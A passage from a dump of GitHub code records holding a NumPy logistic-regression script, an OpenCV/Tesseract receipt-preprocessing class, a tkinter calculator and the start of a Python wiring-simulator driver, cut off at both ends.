range(num_iterations):\r\n Z = np.dot(W.T, X) + b # shape: (1, m)\r\n A = sigmoid(Z) # shape: (1, m)\r\n\r\n if i % 1000 == 0:\r\n # two strategies are both ok\r\n cost_1 = -1.0 / m * (np.dot(Y, np.log(A).T) + np.dot((1-Y), np.log(1-A).T))\r\n print('cost_1:{}'.format(np.squeeze(cost_1)))\r\n cost_2 = -1.0 / m * np.sum(np.multiply(Y, np.log(A)) + np.multiply(1-Y, np.log(1-A)))\r\n print('cost_2:{}'.format(cost_2))\r\n\r\n # computation graph\r\n dZ = A - Y # The derivative of cost to A to Z. shape: (1, m)\r\n dW = 1.0 / m * np.dot(X, dZ.T) # The derivative of cost to A to Z to W. 
shape: (nx, 1)\r\n W -= alpha * dW # update W\r\n db = 1.0 / m * np.sum(dZ) # The derivative of cost to A to Z to b\r\n b -= alpha * db # update b\r\n return W, b\r\n\r\ndef plotBestFit(X, Y, w, b):\r\n \"\"\"\r\n Plot src data and final model.\r\n Revised codes from Machine Learning in Action.\r\n \"\"\"\r\n import matplotlib.pyplot as plt\r\n xcord1 = []\r\n ycord1 = []\r\n xcord2 = []\r\n ycord2 = []\r\n\r\n for i in range(X.shape[1]):\r\n if int(Y[0, i]) == 1:\r\n xcord1.append(X[0, i])\r\n ycord1.append(X[1, i])\r\n else:\r\n xcord2.append(X[0, i])\r\n ycord2.append(X[1, i])\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.scatter(xcord1, ycord1, s=30, c='red', marker='s')\r\n ax.scatter(xcord2, ycord2, s=30, c=\"green\")\r\n x = np.linspace(-3, 3, 100)\r\n y = -(b+w[0][0] * x) / w[1][0]\r\n ax.plot(x, y)\r\n plt.xlabel('x1')\r\n plt.ylabel('x2')\r\n plt.title('Logistic regression')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n X, Y = load_data('test_data_from_ML_in_action.txt')\r\n print('before X shape:{}, Y shape:{}'.format(X.shape, Y.shape))\r\n X = np.transpose(X)\r\n Y = np.reshape(Y, newshape=(1, Y.shape[0]))\r\n print('after X shape:{}, Y shape:{}'.format(X.shape, Y.shape))\r\n nx = X.shape[0]\r\n ny = Y.shape[0]\r\n m = X.shape[1]\r\n print('nx:%d, ny:%d, m:%d' % (nx, ny, m))\r\n print('first three examples:')\r\n print('x:{}, y:{}'.format(X[:,0:3], Y[:,0:3]))\r\n num_iterations = 10000\r\n alpha = 0.01\r\n\r\n w, b = gradient_descent(X, Y, nx, ny, m, num_iterations, alpha)\r\n print(w)\r\n print(b)\r\n plotBestFit(X, Y, w, b)\r\n","repo_name":"gaoisbest/Machine-Learning-and-Deep-Learning-basic-concepts-and-sample-codes","sub_path":"Logistic regression/Logistic_regression_vectorized.py","file_name":"Logistic_regression_vectorized.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"28325034187","text":"import cv2 as cv\nimport numpy as np\nimport sys\n# from PIL import Image\nfrom enum import Enum\nimport pytesseract\nfrom difflib import SequenceMatcher\nimport imutils\n\nclass locales(Enum):\n TiendaInglesa = 1\n Disco = 2\n Devoto = 3\n Geant = 4\n Kinko = 5\n Frog = 6\n Macro = 7\n Tata = 8\n\n\nclass preprocessing:\n\n img = 0\n thresh = 0\n gray_img = 0\n deskewed = 0\n denoised = 0\n cleaned = 0\n joined = 0\n height = 0\n width = 0\n thresholdingBlockSize = 3009\n thresholdingConstant = 2\n cannyThresh1 = 100\n cannyThresh2 = 200\n edges = 0\n region = 0\n cropped = 0\n ticketWidthmm = 79\n consumoFinalTIBoxWidthmm = 65\n consumoFinalTIBoxHeightmm = 9.5\n consumoFinalVarBoxWidthmm = 70\n consumoFinalVarBoxHeightmm = 12\n consumoFinalDevSBoxWidthmm = 59\n consumoFinalDevSBoxHeightmm = 9.5\n consumoFinalDevLBoxWidthmm = 59\n consumoFinalDevLBoxHeightmm = 15\n local = 0\n consumoFinalBoxWidthPx = 0\n consumoFinalBoxHeightPx = 0\n croppedImgWidthPx = 0\n croppedImgHeightPx = 0\n CFBoxWidthTolerance = 0.20\n CFBoxHeightTolerance = 0.20\n erodeKernelSize = 45\n extentLimit = 0.75\n CFText = \"CONSUMO FINAL\"\n CFBoxFound = False\n productRegion = 0\n priceRegion = 0\n priceAreaDivisionLim = 0.62\n\n\n def __init__(self, imgPath, supermarket):\n self.getImage(imgPath)\n self.local = supermarket\n self.height, self.width = self.img.shape[:2]\n\n def getImage(self, imgPath):\n self.img = cv.imread(imgPath)\n if self.img is None:\n sys.exit(\"Could not open the image\")\n\n def grayscaling(self):\n self.gray_img = cv.cvtColor(self.img, 
cv.COLOR_BGR2GRAY)\n\n def adaptiveThresholding(self):\n self.grayscaling()\n self.thresh = cv.adaptiveThreshold(self.gray_img, 255, cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY, self.thresholdingBlockSize, self.thresholdingConstant)\n\n def deskew(self, image):\n coords = np.column_stack(np.where(image > 0))\n angle = cv.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv.warpAffine(image, M, (w, h), flags=cv.INTER_CUBIC, borderMode=cv.BORDER_REPLICATE)\n return rotated\n\n def denoise(self):\n self.denoised = cv.fastNlMeansDenoising(self.thresh, None, 100, 21, 49)\n\n def cleanImage(self):\n kernel = np.ones((5,5),np.uint8)\n dilatedImage = cv.dilate(self.thresh, kernel, None, iterations=1)\n self.cleaned = cv.erode(dilatedImage, kernel, None, iterations=1)\n\n def edgeDetection(self):\n self.gray_img = cv.cvtColor(self.img, cv.COLOR_BGR2GRAY)\n thresh = cv.threshold(self.gray_img, 180, 255, cv.THRESH_BINARY)[1]\n self.edges = cv.Canny(thresh, self.cannyThresh1, self.cannyThresh2)\n\n def findPaperEdge(self):\n self.grayscaling()\n self.adaptiveThresholding()\n self.cleanImage()\n self.displayImage(self.cleaned)\n self.joinLetters()\n self.displayImage(self.joined)\n cv.imshow('output', self.img)\n cv.waitKey(0)\n\n kernel = np.ones((self.erodeKernelSize,self.erodeKernelSize),np.uint8)\n eroded = cv.erode(self.thresh, kernel, None, iterations=1)\n cv.imshow('output', eroded)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n contours, hierarchy = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n im3 = cv.cvtColor(eroded, cv.COLOR_GRAY2BGR)\n\n maxArea = 0\n savedContour = 0\n for i in range(0, len(contours)):\n area = cv.contourArea(contours[i])\n if area > maxArea:\n maxArea = area\n savedContour = i\n cv.drawContours(im3, contours, savedContour, (0,255,0), 8, cv.FILLED)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n \"\"\"\n lines = cv.HoughLines(im3,1,np.pi/180,200)\n for line in lines:\n rho,theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n cv.line(im3,(x1,y1),(x2,y2),(0,0,255),2)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n \"\"\"\n contours_poly = cv.approxPolyDP(contours[savedContour], 150, True)\n cv.drawContours(im3, contours_poly, -1, (0,0,255), 18, cv.FILLED)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n rect = cv.minAreaRect(contours_poly)\n if rect[1][0] < rect[1][1]:\n self.croppedImgWidthPx = rect[1][0]\n self.croppedImgHeightPx = rect[1][1]\n else:\n self.croppedImgWidthPx = rect[1][1]\n self.croppedImgHeightPx = rect[1][0]\n\n area = cv.contourArea(contours[savedContour])\n extent = float(area)/(self.croppedImgHeightPx*self.croppedImgWidthPx)\n print(extent)\n\n if extent < self.extentLimit:\n #find straight lines\n print(\"Mal detectado\")\n\n box = cv.boxPoints(rect)\n box = np.int0(box)\n\n cv.drawContours(im3, [box], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n return box\n\n def calculateCFBoxDims(self):\n anchoBoxmm = 0\n altoBoxmm = 0\n if self.local == locales.TiendaInglesa:\n anchoBoxmm = self.consumoFinalTIBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n 
elif self.local == locales.Geant:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalVarBoxHeightmm\n elif self.local == locales.Disco:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalVarBoxHeightmm\n elif self.local == locales.Devoto:\n anchoBoxmm = self.consumoFinalDevSBoxWidthmm\n altoBoxmm = (self.consumoFinalDevSBoxHeightmm + self.consumoFinalDevLBoxHeightmm)/2\n self.CFBoxHeightTolerance = 0.35\n elif self.local == locales.Frog:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Kinko:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Tata:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Macro:\n sys.exit()\n\n self.consumoFinalBoxWidthPx = self.croppedImgWidthPx*anchoBoxmm/self.ticketWidthmm\n self.consumoFinalBoxHeightPx = altoBoxmm*self.consumoFinalBoxWidthPx/anchoBoxmm \n\n def detectCFBox(self):\n boxFound = False\n kernel = np.ones((7,7),np.uint8)\n contourImg = cv.erode(self.cropped, kernel, None, iterations=1)\n contours, hierarchy = cv.findContours(contourImg, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n recCenter = 0\n recWidth = 0\n recHeight = 0\n CFBox = 0\n widthHighLimit = self.consumoFinalBoxWidthPx*(1+self.CFBoxWidthTolerance)\n widthLowLimit = self.consumoFinalBoxWidthPx*(1-self.CFBoxWidthTolerance)\n heightHighLimit = self.consumoFinalBoxHeightPx*(1+self.CFBoxHeightTolerance)\n heightLowLimit = self.consumoFinalBoxHeightPx*(1-self.CFBoxHeightTolerance)\n print(\"Limits W=(\"+str(widthLowLimit)+\", \"+str(widthHighLimit)+\") H=(\"+str(heightLowLimit)+\", \"+str(heightHighLimit)+\")\")\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n #self.displayImageContours(contourImg, contours, -1)\n i = 0\n\n for c in contours:\n simplifiedContour = cv.approxPolyDP(c, 3, True)\n boundingRect = cv.minAreaRect(simplifiedContour)\n CFBox = boundingRect\n recCenter = boundingRect[0]\n recWidth = boundingRect[1][0]\n recHeight = boundingRect[1][1]\n widthOK1 = (recWidth < widthHighLimit) and (recWidth > widthLowLimit)\n heightOK1 = (recHeight < heightHighLimit) and (recHeight > heightLowLimit)\n widthOK2 = (recWidth < heightHighLimit) and (recWidth > heightLowLimit)\n heightOK2 = (recHeight < widthHighLimit) and (recHeight > widthLowLimit)\n\n #print(\"W=\"+str(recWidth)+\" H=\"+str(recHeight))\n #self.displayImageContours(contourImg, contours, i)\n\n if ((heightOK1 and widthOK1) or (heightOK2 and widthOK2)) and (recCenter[1] < self.croppedImgHeightPx/2):\n text = self.readRegionText(np.int0(cv.boxPoints(CFBox)), self.cropped)\n print(text)\n similarity = SequenceMatcher(None, text, self.CFText).ratio()\n print(similarity)\n cv.waitKey(0)\n if similarity >= 0.7:\n print(\"Box found!\")\n boxFound = True\n break\n \n i = i + 1\n\n box = np.int0(cv.boxPoints(CFBox))\n\n return box, boxFound\n\n def readRegionText(self, region, image):\n blank = np.zeros_like(image)\n boxRegion = cv.fillConvexPoly(blank, region, 255)\n boxRegionImage = cv.bitwise_and(image, boxRegion)\n kernel = np.ones((3,3),np.uint8)\n boxRegionImage = cv.dilate(boxRegionImage, kernel, None, iterations=1)\n cv.imwrite('textRegion.jpg', boxRegionImage)\n text = pytesseract.image_to_string(boxRegionImage, lang=\"spa\", config='-psm 6 -c tessedit_char_whitelist=12345678ABCDEFGHIJKLMNOPQRSTUVWXYZ., load_system_dawg=false load_freq_dawg=false')\n return 
text\n\n def joinLetters(self):\n kernel = np.ones((5,5),np.uint8)\n erodedImage = cv.erode(self.cleaned, kernel, None, iterations=1)\n self.joined = cv.dilate(erodedImage, kernel, None, iterations=1)\n\n def ROI(self, box):\n #ROI= np.array([[(120,self.height),(120,220),(750,220),(750,self.height)]], dtype= np.int32)\n blank= np.zeros_like(self.gray_img)\n region_of_interest= cv.fillConvexPoly(blank, box,255)\n region_of_interest_image= cv.bitwise_and(self.thresh, region_of_interest)\n return region_of_interest_image\n\n def extractReadingAreas(self, image, boxFactura, boxCF):\n _, prodAreaLowerLim, prodAreaLeftLim, priceAreaRightLim = self.boxLimits(boxFactura)\n _, prodAreaUpperLim, cfBoxLeft, _ = self.boxLimits(boxCF)\n prodAreaRightLim = round(self.croppedImgWidthPx*self.priceAreaDivisionLim) + prodAreaLeftLim\n priceAreaLeftLim = prodAreaRightLim\n priceAreaUpperLim = prodAreaUpperLim\n priceAreaLowerLim = prodAreaLowerLim\n productsBox = np.array([[prodAreaLeftLim, prodAreaLowerLim], [prodAreaLeftLim, prodAreaUpperLim], [prodAreaRightLim, prodAreaUpperLim], [prodAreaRightLim, prodAreaLowerLim]])\n pricesBox = np.array([[priceAreaLeftLim, priceAreaLowerLim], [priceAreaLeftLim, priceAreaUpperLim], [priceAreaRightLim, priceAreaUpperLim], [priceAreaRightLim, priceAreaLowerLim]])\n \n return productsBox, pricesBox\n\n def boxLimits(self, boxPoints):\n lower = max(boxPoints[:,1])\n upper = min(boxPoints[:,1])\n left = min(boxPoints[:,0])\n right = max(boxPoints[:,0])\n return upper, lower, left, right\n \n def displayImage(self, img):\n cv.imshow('output', img)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def displayImageBox(self, img, boxPoints):\n im3 = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, [boxPoints], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def displayImageContours(self, img, contour, idx):\n im3 = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, contour, idx, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def matchTemplate(self, temp, img):\n template = cv.imread(temp)\n template = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n template = cv.Canny(template, 50, 200)\n (tH, tW) = template.shape[:2]\n cv.imshow(\"Template\", template)\n found = None\n\n for scale in np.linspace(0.2, 2.0, 40)[::-1]:\n resized = imutils.resize(img, width=int(img.shape[1]*scale))\n r = img.shape[1]/float(resized.shape[1])\n if resized.shape[0] < tH or resized.shape[1] < tW:\n break\n edged = cv.Canny(resized, 50, 200)\n result = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n (_, maxVal, _, maxLoc) = cv.minMaxLoc(result)\n np.dstack([edged, edged, edged])\n # clone = np.dstack([edged, edged, edged])\n #cv.rectangle(clone, (maxLoc[0], maxLoc[1]),(maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n #cv.namedWindow(\"Visualize\", cv.WINDOW_NORMAL)\n #cv.imshow(\"Visualize\", clone)\n #cv.waitKey(0)\n\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n\n (_, maxLoc, r) = found\n (startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n\n img_color = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.rectangle(img_color, (startX, startY), (endX, endY), (0, 0, 255), 2)\n cv.imshow(\"Image\", img_color)\n cv.waitKey(0)\n cv.imwrite('logo_found.jpg', img_color)\n\nif __name__ == \"__main__\":\n\n cv.namedWindow(\"output\", cv.WINDOW_NORMAL)\n\n functions = 
preprocessing(\"ti_imposible.jpg\", locales.TiendaInglesa)\n \"\"\"\n #functions.getImage()\n #print(functions.gray_img.type())\n functions.thresh = functions.adaptiveThresholding()\n functions.deskewed = functions.deskew(functions.thresh)\n functions.denoise()\n functions.cleanImage()\n functions.joinLetters()\n cv.imshow('output', functions.thresh)\n cv.waitKey(0)\n cv.imwrite('thresholding.jpg', functions.thresh)\n im2 = functions.thresh\n \"\"\"\n functions.region = functions.findPaperEdge()\n functions.cropped = functions.ROI(functions.region)\n cv.imshow('output', functions.cropped)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n cv.imwrite('cropped.jpg', functions.cropped)\n\n functions.matchTemplate(\"tiendainglesa_template.jpg\", functions.cropped)\n\n functions.calculateCFBoxDims()\n CF, functions.CFBoxFound = functions.detectCFBox()\n \n if not functions.CFBoxFound:\n print(\"-------------NO ENCONTRADO-------------\")\n sys.exit()\n\n im3 = cv.cvtColor(functions.cropped, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, [CF], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n functions.productRegion, functions.priceRegion = functions.extractReadingAreas(functions.cropped, functions.region, CF)\n cv.drawContours(im3, [functions.productRegion], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n cv.drawContours(im3, [functions.priceRegion], 0, (255,0,0), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n productsText = functions.readRegionText(functions.productRegion, functions.cropped)\n priceText = functions.readRegionText(functions.priceRegion, functions.cropped)\n\n with open('productsText.txt', 'w') as prodTxtFile:\n prodTxtFile.write(productsText)\n prodTxtFile.close()\n\n with open('priceText.txt', 'w') as priceTxtFile:\n priceTxtFile.write(priceText)\n priceTxtFile.close()\n\n \"\"\"\n functions.edgeDetection()\n cv.imshow('output', functions.edges)\n cv.waitKey(0)\n cv.imwrite('canny.jpg', functions.edges)\n\n \n cv.imshow('output', functions.cleaned)\n cv.waitKey(0)\n # ROI= np.array([[(120,functions.height),(120,220),(750,220),(750,functions.height)]], dtype= np.int32)\n # draw = cv.polylines(functions.cleaned, ROI, True, (0,255,0), thickness=3)\n # cv.imshow('output', draw)\n # cv.waitKey(0)\n cv.imwrite('cleaned.jpg', functions.cleaned)\n cv.imshow('output', functions.joined)\n cv.waitKey(0)\n cv.imwrite('joined.jpg', functions.joined)\n \"\"\"","repo_name":"agustincosta/thecampeonato","sub_path":"tutorial/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35806967720","text":"from tkinter import *\nwin=Tk()\nwin.title(\"Calculator\")\nwin.configure(bg=\"black\")\nwin.geometry(\"350x520\")\nwin.resizable(0,0)\n\nglobal expression\nexpression=0\n#define entry field\n\ne1=Entry(win,width=15,font=\"Ariel 28 bold\",borderwidth=5,bg=\"grey\",takefocus=True)\ne1.place(x=10,y=20)\n\n# define button_click function\n\ndef number_click(number):\n global expression\n expression=e1.get()\n expression=expression+str(number)\n e1.delete(0,END)\n e1.insert(END,expression)\n\ndef clear():\n global expression\n expression=\"\"\n e1.delete(0,END)\n\ndef equal():\n try:\n global expression\n expression=e1.get()\n e1.delete(0,END)\n result=str(eval(expression))\n e1.insert(END,result)\n expression=\"\"\n except:\n pass\n\ndef display_result(e):\n try:\n expression= 
e1.get()\n e1.delete(0,END)\n result=str(eval(expression))\n e1.insert(END,result)\n except:\n pass\n\ne1.bind('',display_result)\n\n# defining buttons\n\nbtn1=Button(win,text=\"1\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('1'))\nbtn2=Button(win,text=\"2\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('2'))\nbtn3=Button(win,text=\"3\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('3'))\nbtn4=Button(win,text=\"4\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('4'))\nbtn5=Button(win,text=\"5\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('5'))\nbtn6=Button(win,text=\"6\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('6'))\nbtn7=Button(win,text=\"7\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('7'))\nbtn8=Button(win,text=\"8\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('8'))\nbtn9=Button(win,text=\"9\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('9'))\nbtn0=Button(win,text=\"0\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('0'))\nbtn_dot=Button(win,text=\".\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('.'))\n\nbtn_add=Button(win,text=\"+\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('+'))\nbtn_sub=Button(win,text=\"-\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('-'))\nbtn_mul=Button(win,text=\"x\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('*'))\nbtn_div=Button(win,text=\"/\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('/'))\n\nbtn_equals=Button(win,text=\"=\",width=11,font=\"Ariel 22 bold\",bg=\"gray\",command=equal)\nbtn_clear=Button(win,text=\"Clear\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=clear)\n\n# putting buttons on the screen\n\nbtn7.place(x=10,y=100)\nbtn8.place(x=122,y=100)\nbtn9.place(x=234,y=100)\n\nbtn4.place(x=10,y=170)\nbtn5.place(x=122,y=170)\nbtn6.place(x=234,y=170)\n\nbtn1.place(x=10,y=240)\nbtn2.place(x=122,y=240)\nbtn3.place(x=234,y=240)\n\nbtn0.place(x=10,y=310)\nbtn_sub.place(x=122,y=310)\nbtn_div.place(x=234,y=310)\n\nbtn_add.place(x=10,y=380)\nbtn_dot.place(x=122, y=380)\nbtn_clear.place(x=234,y=380)\n\nbtn_mul.place(x=10,y=450)\nbtn_equals.place(x=122,y=450)\n\n\nwin.mainloop()\n","repo_name":"AmanPatel18/Calculator-Python-Tkinter-","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"43914668067","text":"import sys\r\n\r\nfrom wiring.bit_dictionary import Bit_Dictionary\r\n\r\nfrom wiring.connection import Connection\r\nfrom wiring.hwcassert import HWCAssert\r\nfrom wiring.memory import Memory\r\nfrom wiring.logic import Logic\r\nfrom wiring.io import Input\r\nfrom wiring.io import Output\r\n\r\nfrom wiring.logic_ops import *\r\n\r\n# Fields to store the values of the optional arguments\r\nreset = False\r\ngenTemplate = False\r\ntick_count = 0\r\nwire_filename = None\r\ninput_filename = None\r\ndebug = 0\r\nauto = False\r\n\r\n# Internal bit_dictionary that stores all the bit information\r\nglobal bit_dictionary \r\nbit_dictionary = Bit_Dictionary()\r\n\r\n# Data structures to store the components used \r\noutputs = []\r\ninputs = []\r\n\r\nlogic_ops = {}\r\nconstants = {}\r\nmemory = {}\r\n\r\ndef 
main():\r\n\r\n '''\r\n Arguments we will support currently:\r\n Usage: python sim_main.py (--reset) (--genTemplate) (--run <tick_count>) (--input <file_name>)\r\n\r\n --run <tick_count>: Sets the simulator to run for <tick_count> ticks\r\n\r\n --input <file_name>: Sets the input file for the simulator, file_name supports csv structure\r\n\r\n --reset: Resets the memory and internal bit array\r\n\r\n --genTemplate: generates the input template\r\n\r\n --debug <step>: Stops program after certain debug step and returns the output\r\n '''\r\n \r\n # If the only argument is the sim_main.py, then return error message\r\n if (len(sys.argv) < 2):\r\n print(\"Correct Usage: python sim_main.py (--reset) (--genTemplate) (--run <tick_count>) (--input <file_name>)\")\r\n exit(1)\r\n\r\n # Parses the runtime arguments and sets their respective global flags\r\n parse_args()\r\n\r\n # TODO: read in input files\r\n # TODO: build the object graph\r\n\r\n '''\r\n Dictionary Structure\r\n\r\n The bit dictionary holds all internal bits and what their connections are. This is used to\r\n ultimately build the graph data structure that will be used to model the circuitry. The format\r\n of the dictionary maps bit ranges to read and write values.\r\n\r\n Bit Dictionary Representation:\r\n +---------------------------------------+\r\n | Bit | Read | Write |\r\n | --------|-----------|----------- | \r\n | [0,1] | [a] | c |\r\n | [1,2] | [a,b] | |\r\n | [2,5] | [NOT] | |\r\n | [6,7] | [] | |\r\n +---------------------------------------+\r\n\r\n INVARIANT: If there is no write, then output\r\n\r\n '''\r\n\r\n # Steps\r\n # 1. Find the bit ranges\r\n # 2. Add read and write values depending on line\r\n # 3. Collapse fan out and fan in connections\r\n\r\n\r\n # TODO: CHANGES\r\n # TODO: Create objects for LogicOps (NOT, AND, etc)\r\n # TODO: Change order of parsing to, output side first\r\n # TODO: Lambdas for the connections\r\n\r\n parse_wire_file()\r\n\r\n # Parse and drive input from input file if specified in the command line\r\n if (input_filename != None):\r\n\r\n try:\r\n # TODO: Create input file formats\r\n\r\n # TODO: Parse input file formats\r\n file = open(input_filename, \"r\")\r\n\r\n line = \" \"\r\n user_inputs = {}\r\n\r\n while line:\r\n line = file.readline()\r\n\r\n # Breaks on empty last line\r\n if line == \"\":\r\n break\r\n\r\n csv_inputs = line.strip().split(\",\")\r\n\r\n if len(csv_inputs) != len(inputs):\r\n print(\"Input file does not have the correct number of inputs\")\r\n exit(1)\r\n\r\n for i in range(len(csv_inputs)):\r\n csv_input = int(csv_inputs[i].strip())\r\n usr_input = inputs[i]\r\n\r\n # START THE SIMULATION WITH THESE INPUTS\r\n assert csv_input >= 0\r\n assert csv_input < 2**(usr_input[1]) # TODO: report an error to the user, not assert!\r\n\r\n user_inputs[usr_input] = csv_input\r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for usr_input in user_inputs:\r\n readers = bit_dictionary.get(usr_input).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(usr_input))\r\n\r\n except IOError:\r\n print(\"ERROR: Unable to find or open \" + input_filename + \" or \" + wire_filename)\r\n exit(1)\r\n \r\n else:\r\n\r\n # TODO: write the simulation algorithm of propagating bits\r\n # Run the 
simulation\r\n\r\n user_inputs = {}\r\n\r\n # AUTO FLAG: used for testing through test script \r\n\r\n # Relistically we should test all possible single bit inputs to determine if the program actually works\r\n # BUT: for now I'm going to only test single bits -> 1\r\n\r\n #TODO: reset code so we can test all bits\r\n\r\n if (auto):\r\n for hwc_input in inputs:\r\n \r\n user_inputs[hwc_input] = 1\r\n\r\n assert user_inputs[hwc_input] >= 0\r\n assert user_inputs[hwc_input] < 2**(hwc_input[1]) # TODO: report an error to the user, not assert!\r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for user_in in user_inputs:\r\n readers = bit_dictionary.get(user_in).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(user_in))\r\n\r\n else:\r\n # TODO: Get input from user input\r\n\r\n for hwc_input in inputs:\r\n \r\n user_inputs[hwc_input] = int(input(\"Enter input for \" + str(hwc_input) + \": \"))\r\n\r\n \r\n assert user_inputs[hwc_input] >= 0\r\n assert user_inputs[hwc_input] < 2**(hwc_input[1]) # TODO: report an error to the user, not assert!\r\n \r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for user_in in user_inputs:\r\n readers = bit_dictionary.get(user_in).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(user_in))\r\n\r\n # TODO: Show output\r\n\r\n'''\r\nFunction: parse_args()\r\nPurpose: Parses sys.argv runtime arguments and fills the respective variable if argument is called\r\n\r\nUpdates: 3/1/2020 - Removed parsing from main() and moved to own function - Dilen Govin\r\n'''\r\ndef parse_args():\r\n # Points to the first argument in sys.argv list\r\n # The pointer moves to the next argument instead of checking total argument length\r\n arg_ptr = 1\r\n\r\n while (arg_ptr < len(sys.argv)):\r\n\r\n # NOT supported right now\r\n if (sys.argv[arg_ptr] == \"--reset\"):\r\n print(\"Command option '--reset' argument is currently not supported\")\r\n global reset\r\n reset = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # NOT supported right now\r\n if (sys.argv[arg_ptr] == \"--genTemplate\"):\r\n print(\"Command option 